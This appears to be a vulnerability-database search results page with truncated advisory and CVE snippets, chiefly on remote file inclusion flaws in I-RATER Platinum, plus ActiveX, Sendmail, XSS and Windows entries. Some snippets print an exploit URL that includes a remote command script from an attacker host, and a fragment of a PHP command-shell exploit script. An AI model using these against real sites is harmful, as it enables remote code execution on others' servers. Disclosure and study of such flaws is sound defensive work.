7747 matches found
Verisign I-Nav ActiveX Control Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Verisign i-Nav ActiveX control. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. The specific flaw exists within the...
irater.txt
" ."target:" ."cmdshell:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $target.$cmdshell, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $file $line .= fgets $file, 1024.""; $tpos...
CVE-2006-2121
PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...
Design/Logic Flaw
PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...
CVE-2006-2121
PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...
CVE-2006-2121
CVE-2006-2121 is a PHP remote file inclusion vulnerability affecting I-RATER Platinum, where an attacker can execute arbitrary code through a URL supplied in the include_path parameter in admin/config_settings.tpl.php. The NVD entry lists a MEDIUM base score (5.0) with network access and no authe...
I-RATER.txt
Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...
[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability
Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...
I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17731/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...
Remote file inclusion
PHP remote file inclusion vulnerability in include/common.php in I-Rater Platinum allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter...
CVE-2006-1929
PHP remote file inclusion vulnerability in include/common.php in I-Rater Platinum allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter...
CVE-2006-1929
PHP remote file inclusion vulnerability in include/common.php in I-Rater Platinum allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter...
CVE-2006-1929
The vulnerability CVE-2006-1929 affects I-Rater Platinum: include/common.php is susceptible to a PHP remote file inclusion (RFI) via a URL provided in the include_path parameter. This leads to arbitrary PHP code execution on the affected system. The documented impact is remote code execution, wit...
I-RATER Platinum - Common.php Remote File Inclusion
I-RATER Platinum - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue...
[SA19684] I-Rater Platinum "include_path" Parameter File Inclusion Vulnerability
TITLE: I-Rater Platinum "includepath" Parameter File Inclusion Vulnerability SECUNIA ADVISORY ID: SA19684 VERIFY ADVISORY: http://secunia.com/advisories/19684/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: I-Rater Platinum http://secunia.com/product/9425/ DESCRIPTIO...
I-RATER Platinum - 'Common.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...
CVE-2006-1377
The CVE-2006-1377 entry describes a Cross-site scripting (XSS) vulnerability in img.php for the applications EasyMoblog 0.5.1 and CoMoblog 1.1 , where an attacker can inject arbitrary web script or HTML via the i parameter. The vulnerability is triggered remotely and the impact stated is that the...
Sendmail signal I/O race condition
Overview A race condition in Sendmail may allow a remote attacker to execute arbitrary code. Description Sendmail Sendmail is a widely used mail transfer agent MTA. Mail Transfer Agents MTA MTAs are responsible for sending an receiving email messages over the internet. They are also referred to a...
i-mall.cgi
The script i-mall.cgi is installed. Some versions of this script are vulnerable to remote command exacution flaw, due to insuficient user input sanitization. A malicious user can pass arbitrary shell commands on the remote server through this script. OpenVAS Vulnerability Test $Id: i-mallcgi.nasl...
[Full-disclosure] Microsoft Windows keybd_event validation vulnerability
Vulnerability: Microsoft Windows keybdevent validation vulnerability. Type:......... Design Flaw Vendor:....... Microsoft Impact:....... Local Privilege Elevation. Credits:...... AndrTarascaT4r @ Haxorcitos.comhttp://Haxorcitos.com .......I Lopez ilo @ reversing.org http://reversing.org...